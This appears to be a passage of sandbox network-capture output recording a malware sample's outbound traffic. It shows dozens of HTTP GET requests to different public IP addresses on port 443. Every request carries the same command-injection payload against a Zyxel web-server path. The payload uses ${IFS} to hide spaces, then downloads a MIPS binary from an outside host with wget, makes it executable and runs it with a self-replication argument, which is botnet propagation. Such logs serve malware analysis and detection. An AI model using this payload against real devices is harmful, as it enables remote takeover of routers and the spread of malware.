                                                        Feb 2, 2024 06:21:15.026788950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5771192.168.2.1459776125.13.184.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026856899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5772192.168.2.145084464.84.228.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026897907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5773192.168.2.1438714162.203.255.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026915073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5774192.168.2.1435658158.131.50.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.026961088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5775192.168.2.143440064.172.113.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027005911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5776192.168.2.1449846144.8.49.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027120113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5777192.168.2.1449446179.200.178.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027173996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5778192.168.2.145495834.157.31.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027213097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5779192.168.2.145964050.123.89.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027246952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5780192.168.2.144527077.177.36.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027280092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5781192.168.2.1449794163.167.21.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027335882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5782192.168.2.1448702130.5.215.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027373075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5783192.168.2.1456446170.237.255.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027400017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5784192.168.2.1446188137.26.52.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027431011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5785192.168.2.144585623.96.61.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027471066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5786192.168.2.1433874113.223.75.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027507067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5787192.168.2.143371293.224.63.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027558088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5788192.168.2.1453834132.248.65.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027569056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5789192.168.2.1448734151.139.248.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027611971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5790192.168.2.1451562194.235.126.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.027646065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5791192.168.2.1455728203.53.143.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038114071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5792192.168.2.1453658142.193.212.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038176060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5793192.168.2.1434642164.159.198.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038194895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5794192.168.2.145264687.225.76.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038249016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5795192.168.2.14583329.71.36.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038306952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5796192.168.2.1458464221.197.12.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038335085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5797192.168.2.1444986182.41.44.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038388014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5798192.168.2.143584418.81.186.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038439989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5799192.168.2.1450264193.217.225.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038472891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5800192.168.2.1449654181.193.181.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038502932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5801192.168.2.1439000138.19.222.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038548946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5802192.168.2.143328637.61.172.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038600922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5803192.168.2.1446436151.156.169.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038639069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5804192.168.2.144449271.23.130.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038674116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5805192.168.2.1452344164.178.215.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038693905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5806192.168.2.1455490183.252.188.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038757086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5807192.168.2.143607454.177.48.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038789034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5808192.168.2.1448330169.220.23.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038820982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5809192.168.2.1445206222.215.92.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038875103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5810192.168.2.144805296.244.129.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038887978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5811192.168.2.1439090223.26.75.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.038950920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5812192.168.2.144479069.104.94.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039004087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5813192.168.2.1450142130.2.255.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039041996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5814192.168.2.146034238.176.147.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039093971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5815192.168.2.1449304200.189.107.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039128065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5816192.168.2.145518651.185.184.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039170027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5817192.168.2.1444036211.6.212.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039220095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5818192.168.2.1432782180.215.24.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039251089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5819192.168.2.1454298187.248.52.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039292097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5820192.168.2.143530638.148.178.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039340019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5821192.168.2.1447884131.32.62.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039387941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5822192.168.2.1453788181.120.59.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039411068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5823192.168.2.1436358144.234.172.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039464951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5824192.168.2.145985875.225.210.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039486885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5825192.168.2.1456832181.27.102.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039529085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5826192.168.2.146088484.101.167.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039585114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5827192.168.2.145849627.220.62.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039637089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5828192.168.2.144657857.92.1.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039685965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5829192.168.2.1440092188.24.88.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039709091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5830192.168.2.143446644.53.250.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039757967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5831192.168.2.1455132140.61.91.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039788961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5832192.168.2.1439602192.109.38.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039849997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5833192.168.2.1436870118.121.168.215443
                                                        TimestampBytes transferredDirectionData
